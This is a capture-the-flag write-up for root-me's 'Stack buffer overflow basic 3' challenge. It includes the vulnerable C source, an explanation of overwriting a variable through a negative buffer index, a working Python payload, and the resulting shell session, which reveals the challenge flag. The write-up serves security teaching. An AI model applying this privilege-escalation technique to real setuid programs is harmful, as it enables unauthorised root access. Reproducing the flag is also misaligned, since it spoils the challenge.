# [root-me.org/App-System] ELF x86 - Stack buffer overflow basic 3

## Challenge config
```
Host	challenge02.root-me.org
Protocol	SSH
Port	2222
SSH access	ssh -p 2222 app-systeme-ch16@challenge02.root-me.org
Username	app-systeme-ch16
Password	app-systeme-ch16
```

## Examine
- Challenge info:
```
./ch16: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib, for GNU/Linux 3.2.0, BuildID[sha1]=c6fca4167d24a27ba21747029ee9f71e052e40bc, not stripped
libc: GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.


ASLR is OFF
```

- Test:
```
$ ./ch16 
Enter your name: khanglg
// still running...
```

- Source code:
```c
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
 
void shell(void);
 
int main()
{
 
  char buffer[64];
  int check;
  int i = 0;
  int count = 0;
 
  printf("Enter your name: ");
  fflush(stdout);
  while(1)
    {
      if(count >= 64)
        printf("Oh no...Sorry !\n");
      if(check == 0xbffffabc)
        shell();
      else
        {
            read(fileno(stdin),&i,1);
            switch(i)
            {
                case '\n':
                  printf("\a");
                  break;
                case 0x08:
                  count--;
                  printf("\b");
                  break;
                case 0x04:
                  printf("\t");
                  count++;
                  break;
                case 0x90:
                  printf("\a");
                  count++;
                  break;
                default:
                  buffer[count] = i;
                  count++;
                  break;
            }
        }
    }
}
 
void shell(void)
{
  setreuid(geteuid(), geteuid());
  system("/bin/bash");
}
```
Look at this code I can see that just overwrite `check` by **0xbffffabc** then the `shell()` function will be called. Easy, right? But considered more carefully,  I noticed that the only way allowed me to control the stack is through `buffer`. But here is the stack frame of `main()`:

![image](./images/stack-frame.png)

`check` memory in the opposite direction to the direction that I will write into `buffer`.

However, notice the `count` variable. The program is:
```c
buffer[count] = i;
```
`count` is integer, so it can be negative. What if I make it be:
```c
buffer[-1] = i;
buffer[-2] = i;
...
```
Yeah... That's right. Now we can overwrite the `check` value. And again, the given code already included the hint here:
```c
case 0x08:
  count--;
  printf("\b");
  break;
```
## Exploit

```
app-systeme-ch16@challenge02:~$ python -c 'print "\x08"*4 + "\xbf\xff\xfa\xbc"[::-1]' > /tmp/tmp.txt
app-systeme-ch16@challenge02:~$ cat /tmp/tmp.txt - | ./ch16
Enter your name: abc
/bin/bash: line 2: abc: command not found
cat .passwd
Sm4shM3ify0uC4n
```